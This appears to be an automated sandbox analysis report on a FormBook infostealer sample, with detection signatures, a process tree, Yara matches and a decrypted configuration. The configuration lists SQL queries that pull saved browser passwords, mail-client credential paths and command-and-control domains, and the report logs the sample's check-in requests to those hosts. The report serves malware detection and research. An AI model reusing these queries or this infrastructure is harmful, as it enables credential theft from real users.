Play interactive tour

Edit tour

Analysis Report YvGnm93rap.exe

Overview

General Information

Sample Name:	YvGnm93rap.exe
Analysis ID:	339311
MD5:	16e1a5d26c0698ac48d63661264e0ba1
SHA1:	5e61d05157c4aa1acfc6a89de619f6bbcad176f6
SHA256:	e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Binary contains a suspicious time stamp

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

YvGnm93rap.exe (PID: 2396 cmdline: 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: 16E1A5D26C0698AC48D63661264E0BA1)

YvGnm93rap.exe (PID: 6196 cmdline: {path} MD5: 16E1A5D26C0698AC48D63661264E0BA1)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msiexec.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cmd.exe (PID: 6564 cmdline: /c del 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fakecostasunglasses.com", "twinbrothers.pizza", "jizhoujsp.com", "qscrit.com", "hotelmanise.com", "fer-ua.online", "europserver-simcloud.systems", "redwap2.pro", "betwalkoffame.com", "latashalovemillionaire.com", "8million-lr.com", "tomatrader.com", "modaluxcutabovefitness.com", "shishijiazu.com", "cckytx.com", "reversehomeloansmiami.com", "imaginenationnetwork.com", "thecyclistshop.com", "jorgegiljewelry.com", "hlaprotiens.com", "biblecourt.com", "puzelhome.com", "musicbychristina.com", "iregentos.info", "ephwehemeral.com", "qubeeva.com", "healingwithkarlee.com", "giftasmile2day.com", "ondesign03.net", "argusproductionsus.com", "tootleshook.com", "sukien-freefire12.com", "windmaske.com", "futbolclubbarcelona.soccer", "veteransc60.com", "steambackpacktrade.info", "zingnation.com", "myfoodworldcup.com", "playitaintso.net", "crafteest.com", "deutschekorrosionsschutz.net", "streamcommunitty.com", "gatehess.com", "hechoenvegas.net", "4037a.com", "santanabeautycares.com", "100feetpics.com", "johnsroadantiques.com", "improve-climbing.com", "18shuwu.net", "amazon-support-recovery.com", "vibrarecovery.com", "deskdonors.info", "triagggroup.com", "probysweden.com", "helloinward.com", "vvardown.com", "kicksends.com", "alwayadopt.com", "modernappsllc.com", "itswooby.com", "med.vegas", "chadwestconsulting.com", "africanosworld.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bodyfuelrtd.com/8rg4/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x11de98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11e232:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1452b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x145652:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x129f45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151365:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x129a31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150e51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12a047:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x151467:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12a1bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1515df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11ec4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14606a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x128cac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1500cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11f9c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x146de2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x12f037:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x156457:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1300da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x12bf69:$sqlite3step: 68 34 1C 7B E1 0x12c07c:$sqlite3step: 68 34 1C 7B E1 0x153389:$sqlite3step: 68 34 1C 7B E1 0x15349c:$sqlite3step: 68 34 1C 7B E1 0x12bf98:$sqlite3text: 68 38 2A 90 C5 0x12c0bd:$sqlite3text: 68 38 2A 90 C5 0x1533b8:$sqlite3text: 68 38 2A 90 C5 0x1534dd:$sqlite3text: 68 38 2A 90 C5 0x12bfab:$sqlite3blob: 68 53 D8 7F 8C 0x12c0d3:$sqlite3blob: 68 53 D8 7F 8C 0x1533cb:$sqlite3blob: 68 53 D8 7F 8C 0x1534f3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: YvGnm93rap.exe PID: 2396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.YvGnm93rap.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.YvGnm93rap.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.YvGnm93rap.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
2.2.YvGnm93rap.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.YvGnm93rap.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.YvGnm93rap.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.YvGnm93rap.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for submitted file

Show sources

Source: YvGnm93rap.exe	Virustotal: Detection: 46%			Perma Link
Source: YvGnm93rap.exe	ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: YvGnm93rap.exe

Joe Sandbox ML: detected

Source: 2.2.YvGnm93rap.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: YvGnm93rap.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: YvGnm93rap.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: YvGnm93rap.exe

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 4x nop then pop ebx		2_2_00406A98
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 4x nop then pop edi		2_2_0040C3EB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80

Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
